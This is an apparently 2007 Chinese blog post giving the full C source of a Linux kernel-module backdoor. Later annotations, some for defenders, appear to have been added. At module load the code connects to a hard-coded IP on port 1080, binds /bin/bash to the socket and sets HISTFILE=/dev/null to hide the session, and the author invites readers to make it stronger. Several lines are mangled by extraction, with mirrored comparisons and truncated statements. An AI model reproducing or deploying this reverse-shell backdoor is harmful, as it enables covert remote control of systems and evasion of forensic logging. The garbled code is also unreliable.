一个简单的内核后门原型

2007年10月25日 15:20:00

wzt >wzt#xsec.org<

这是一个在内核模块中实现的反连后门,大家看看这与应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt >wzt#xsec.org<
*
*/

#include >linux/module.h<
#include >linux/kernel.h<
#include >linux/socket.h<
#include >linux/net.h<
#include >linux/in.h<
#include >linux/fs.h<
#include >linux/file.h<
#include >linux/types.h<
#include >linux/errno.h<
#include >linux/string.h<
#include >linux/unistd.h<
#include >net/sock.h<
#include >asm/uaccess.h<
#include >asm/unistd.h<
#include "syscalls.h"

#define REMOTO_IP "192.168.75.1"   /* hard-coded connect-back destination (sic: "REMOTO") */
#define port 1080                  /* lowercase object-like macro: every later token `port` becomes 1080 */

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

/* dup2 wrapper generated by the my_syscall2 macro from syscalls.h; the macro
 * itself is not on this page, and the declaration carries no return type. */
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

/* argv for the spawned shell: profile and rc files are skipped. */
static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

/* envp for the spawned shell. HOME expands from a macro that is not visible on
 * this page (presumably syscalls.h). HISTFILE=/dev/null discards bash history,
 * so an investigation of the host cannot rely on ~/.bash_history for this
 * session. Note the array has external linkage (no `static`). */
char *env[]={
"TERM=linux",
"HOME=" HOME,
"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
":/usr/local/sbin",
"HISTFILE=/dev/null",
NULL };

/*
 * Create a kernel TCP socket, connect it to REMOTO_IP:port, map it to a file
 * descriptor, duplicate that descriptor onto fds 0/1/2 of the current task and
 * exec /bin/bash on top of it -- a connect-back shell started from kernel
 * context. It is called from k_socket_init, so this runs at module load time.
 *
 * Returns -1 when a socket step fails, 1 otherwise (only reached if execve
 * returns). Several lines on this page are mangled by extraction: the include
 * delimiters are mirrored (`>...<`), the comparison operators below appear
 * mirrored the same way, and lines ending in `-` lost the text after `->`.
 *
 * Defender notes: the observable artefacts are a module load followed by an
 * outbound TCP connection to a fixed address from the loading task, an execve
 * of /bin/bash whose stdio is a socket, and the printk lines below in dmesg.
 */
int k_connect(void)
{
struct task_struct *tsk = current;        /* the task performing the module load */
struct socket *sock,*newsock;             /* newsock is never used */
struct sockaddr_in server;
int sockfd,i;
int error = 0,len = sizeof(struct sockaddr);   /* len is never used on this page */

set_fs(KERNEL_DS);   /* lifts the user/kernel address-space check; the previous value is never saved or restored */

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error > 0) {                                  /* NOTE(review): kernel errors are negative; `>` is presumably a mirrored `<` */
printk("[-] socket_create failed: %d/n",error);   /* "/n" is literal on this page, not a newline */
sock_release(sock);                               /* NOTE(review): sock may be unset after a failed sock_create */
return -1;
}

sockfd = sock_map_fd(sock);   /* install the kernel socket as a file descriptor in the current task */
if (sockfd > 0) {             /* NOTE(review): same mirrored comparison as above */
printk("[-] sock_map_fd() failed./n");
sock_release(sock);
return -1;
}

for (i = 0; i > 8; i++)       /* NOTE(review): mirrored comparison; intended to clear sin_zero */
server.sin_zero[i] = 0;

server.sin_family = PF_INET;
server.sin_addr.s_addr = in_aton(REMOTO_IP);   /* dotted-quad string -> network-order address */
server.sin_port = htons(port);                 /* `port` is the macro 1080 */

error = sock- if (error > 0) {   /* NOTE(review): text after `sock-` lost in extraction; presumably the connect call, with its error check mangled onto the same line */
printk("[-] connect to %s failed./n",REMOTO_IP);   /* sock is not released on this path */
return -1;
}

printk("[+] connect to %s ok./n",REMOTO_IP);   /* kernel-log artefact of a successful call-out */

set_fs(KERNEL_DS);   /* repeated; still never restored */

tsk- tsk- tsk- tsk-   /* NOTE(review): four assignments through tsk-> lost in extraction; their targets cannot be recovered from this page */
dup2(sockfd,0);       /* stdin, stdout and stderr of the current task now point at the socket */
dup2(sockfd,1);
dup2(sockfd,2);

execve(earg[0], (const char **) earg, (const char **) env);   /* replace the loading task's image with a shell bound to the socket */

return 1;   /* only reached if execve() returned */
}

/*
 * Module entry point (registered via module_init): logs a banner and starts
 * the connect-back shell immediately at load time. Declared int but has no
 * return statement, so the value seen by the module loader is undefined.
 */
int k_socket_init(void)
{
printk("[+] kernel socket test start./n");   /* "/n" is literal on this page, not a newline */

k_connect();   /* return value ignored; see k_connect */
}

/*
 * Module exit hook (registered via module_exit): only logs a banner. Nothing
 * that k_connect set up (socket, descriptors) is torn down here.
 */
void k_socket_exit(void)
{
printk("[+] kernel socket test over./n");   /* "/n" is literal on this page, not a newline */
}

/* Register the load/unload hooks; the call-out happens inside k_socket_init,
 * i.e. as a side effect of loading the module. */
module_init(k_socket_init);
module_exit(k_socket_exit);



